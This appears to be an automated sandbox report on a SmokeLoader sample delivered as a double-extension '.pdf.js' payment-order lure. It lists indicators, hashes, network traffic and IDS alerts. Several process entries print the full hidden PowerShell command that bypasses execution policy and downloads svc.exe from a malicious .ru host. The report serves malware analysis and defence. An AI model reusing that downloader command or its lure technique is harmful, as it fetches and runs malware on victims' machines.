File name: i_i_10.09.2024.rar

Full analysis: https://app.any.run/tasks/ccb41ee8-3603-4b81-b087-ffb6d09e90ba
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 11, 2024, 09:43:43
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: opendir, loader, smokeloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: BF64C4011ABF4785A25511B24C0B3459
SHA1: 4A5E081153535689F67487B5694E6C8E8EA46330
SHA256: E77A6658A160C60BBBFB226F5418B637EDDE1A1066C9F43D61A40034B7FCCF5D
SSDEEP: 3072:XkrrW18L9xxZbpTVDTQ0IoYgT+njieeAWiDI4:XkrqWL9nppVDThIqTyjieeAhDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Application was injected by another process

      • explorer.exe (PID: 4552)
    • Runs injected code in another process

      • TempaFY25.exe (PID: 5112)
    • SMOKE has been detected (SURICATA)

      • explorer.exe (PID: 4552)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6156)
    • The process executes JS scripts

      • WinRAR.exe (PID: 6156)
      • explorer.exe (PID: 4552)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)
    • Probably download files using WebClient

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)
    • The executable file from the user directory is run by the CMD process

      • TempaFY25.exe (PID: 5112)
      • TempAXY31.exe (PID: 7012)
      • TempAXY31.exe (PID: 6948)
      • TempaFY25.exe (PID: 6784)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • explorer.exe (PID: 4552)
      • powershell.exe (PID: 1172)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Executes application which crashes

      • TempAXY31.exe (PID: 7012)
    • Creates file in the systems drive root

      • explorer.exe (PID: 4552)
  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 6156)
      • explorer.exe (PID: 4552)
    • The process uses the downloaded file

      • wscript.exe (PID: 1640)
      • WinRAR.exe (PID: 6156)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • explorer.exe (PID: 4552)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)
    • Disables trace logs

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Checks proxy server information

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • WerFault.exe (PID: 5516)
      • powershell.exe (PID: 6768)
      • explorer.exe (PID: 4552)
      • slui.exe (PID: 6872)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)
    • Checks supported languages

      • TempaFY25.exe (PID: 5112)
      • TempAXY31.exe (PID: 7012)
      • TempAXY31.exe (PID: 6948)
      • TempaFY25.exe (PID: 2616)
      • TempaFY25.exe (PID: 6784)
      • TempAXY31.exe (PID: 6500)
    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4552)
      • notepad.exe (PID: 4576)
    • Manual execution by a user

      • wscript.exe (PID: 2768)
      • notepad.exe (PID: 4576)
    • Reads the software policy settings

      • WerFault.exe (PID: 5516)
      • slui.exe (PID: 5276)
      • slui.exe (PID: 6872)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 5516)
      • explorer.exe (PID: 4552)
    • Sends debugging messages

      • notepad++.exe (PID: 2112)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2900)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2024:09:09 23:15:16
ZipCRC: 0x3554975b
ZipCompressedSize: 3679
ZipUncompressedSize: 13102
ZipFileName: Платежное Поручение в iнозеной валюте.pdf.js
All screenshots are available in the full report
Total processes: 171
Monitored processes: 38
Malicious processes: 10
Suspicious processes: 8

Behavior graph

Processes in the order they appear in the graph (the "no specs" marker is carried over from the report):
winrar.exe (no specs), wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, tempafy25.exe (no specs), tempaxy31.exe, sppextcomobj.exe (no specs), slui.exe, werfault.exe, wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, notepad.exe (no specs), tempaxy31.exe (no specs), #SMOKE explorer.exe, notepad++.exe, wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, tempafy25.exe (no specs), slui.exe, rundll32.exe (no specs), tempafy25.exe (no specs), tempaxy31.exe (no specs), winrar.exe (no specs), notepad.exe (no specs), notepad.exe (no specs), wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe

Process information

PID | CMD | Path | Indicators | Parent process
PID: 568
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 608
CMD: pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempAXY31.exe');
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 888
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1172
CMD: pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempaFY25.exe');
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 1640
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.js"
Path: C:\Windows\System32\wscript.exe
Parent process: WinRAR.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2108
CMD: pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempaFY25.exe');
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2112
CMD: "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Сопроводiтельни документи вiд 09.09.2024p.pdf.js"
Path: C:\Program Files\Notepad++\notepad++.exe
Parent process: explorer.exe
User: admin
Company: Don HO don.h@free.fr
Integrity Level: MEDIUM
Description: Notepad++ : a free (GNU) source code editor
Version: 7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 2208
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2252
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2264
CMD: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\DESKTOP-JGLLJLD-20240308-0110.log
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events: 95 644
Read events: 95 206
Write events: 419
Delete events: 19

Modification events

(PID) Process: (4552) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060280
Operation: write
Name: VirtualDesktop
Value: 1000000030304456033BCEE44DE41B4E8AEC331E84F566D2

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (6156) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation: write
Name: JSFile
Value:

(PID) Process: (1640) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: 2ECA120000000000

(PID) Process: (2108) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0
Executable files: 4
Suspicious files: 11
Text files: 18
Unknown types: 1

Dropped files

PID | Process | Filename | Type
6156 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.js | text
MD5: 503B0E0561D643FF0033F4DCBA2EB474
SHA256: CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
6156 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.15335\Сопроводiтельни документи вiд 09.09.2024p.pdf.js | text
MD5: 1D18D9C37723BB24871AC27B337C87A1
SHA256: 5DEFF829CC94B2231BFD85695D667EE87A31F311BF412EA48445C3BB2370E2D5
5516 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_TempAXY31.exe_7258ae072254ecf92484efe9f7319b8723d8d4_61b0f82e_3fd3b79f-0bf4-4814-82a9-281c684fd947\Report.wer |
MD5:
SHA256:
5516 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB.tmp.WERInternalMetadata.xml | xml
MD5: 493A5032848F3BA1ACE69AB03329AFA5
SHA256: 922C3E8B37F9E77B1106E1CDDF47F42BD1DBA093F1EB671D92884335E9C42C80
4552 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms | binary
MD5: CD490DB4CCFB190B2F149178FE5F1C6B
SHA256: 5831548AABA1FE5849703C75E77D65F69E92DAD1761CB3A3C02902BF63F6D8E9
4552 | explorer.exe | C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat | binary
MD5: E49C56350AEDF784BFE00E444B879672
SHA256: A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
5516 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3A.tmp.xml | xml
MD5: E9273018D986DEB09BC548A667FE4B6B
SHA256: 367FD700586A46F4458F6DFDE68D999F3212C28E56134C0E3F9E9E422AD97F3A
4552 | explorer.exe | C:\Users\admin\Desktop\Платежное Поручение в iнозеной валюте.pdf.js | binary
MD5: 503B0E0561D643FF0033F4DCBA2EB474
SHA256: CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
608 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_imckgkba.0dy.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6156 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa6156.16424\Платежное Поручение в iнозеной валюте.pdf.js | binary
MD5: 503B0E0561D643FF0033F4DCBA2EB474
SHA256: CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
HTTP(S) requests: 13
TCP/UDP connections: 55
DNS requests: 25
Threats: 21

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3424 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | | | whitelisted
| | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted
2108 | powershell.exe | GET | 200 | 147.45.125.198:80 | http://haporproletioperavivo.ru/download/svc.exe | unknown | | | suspicious
608 | powershell.exe | GET | 200 | 147.45.125.198:80 | http://haporproletioperavivo.ru/download/svc.exe | unknown | | | suspicious
3244 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | | | whitelisted
4552 | explorer.exe | POST | 404 | 194.58.112.174:80 | http://johnfabiconinteraption.ru/index.php | unknown | | | unknown
6768 | powershell.exe | GET | 200 | 147.45.125.198:80 | http://haporproletioperavivo.ru/download/svc.exe | unknown | | | suspicious
1148 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | | | whitelisted
1172 | powershell.exe | GET | 200 | 147.45.125.198:80 | http://haporproletioperavivo.ru/download/svc.exe | unknown | | | suspicious
3244 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | | | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
5796 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2120 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
| | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
| | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
4 | System | 192.168.100.255:137 | | | | whitelisted
3260 | svchost.exe | 40.113.103.199:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3424 | svchost.exe | 20.190.159.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3424 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
5796 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
  • 40.127.240.158
  • 52.167.249.196
  • 51.104.136.2
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 88.221.169.152
whitelisted
google.com
  • 142.250.181.238
whitelisted
client.wns.windows.com
  • 40.113.103.199
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.159.64
  • 20.190.159.0
  • 40.126.31.67
  • 20.190.159.4
  • 20.190.159.68
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.23
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
haporproletioperavivo.ru
  • 147.45.125.198
unknown
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.166.126.56
whitelisted
watson.events.data.microsoft.com
  • 104.208.16.94
whitelisted

Threats

PID | Process | Class | Message
2108 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 23
2108 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2108 | powershell.exe | Misc activity | ET INFO Packed Executable Download
2108 | powershell.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608 | powershell.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608 | powershell.exe | Misc activity | ET INFO Packed Executable Download
608 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
6768 | powershell.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
6768 | powershell.exe | Misc activity | ET INFO Packed Executable Download
6768 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
5 ETPRO signatures available at the full report
Process | Message
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | VerifyLibrary: error while getting certificate informations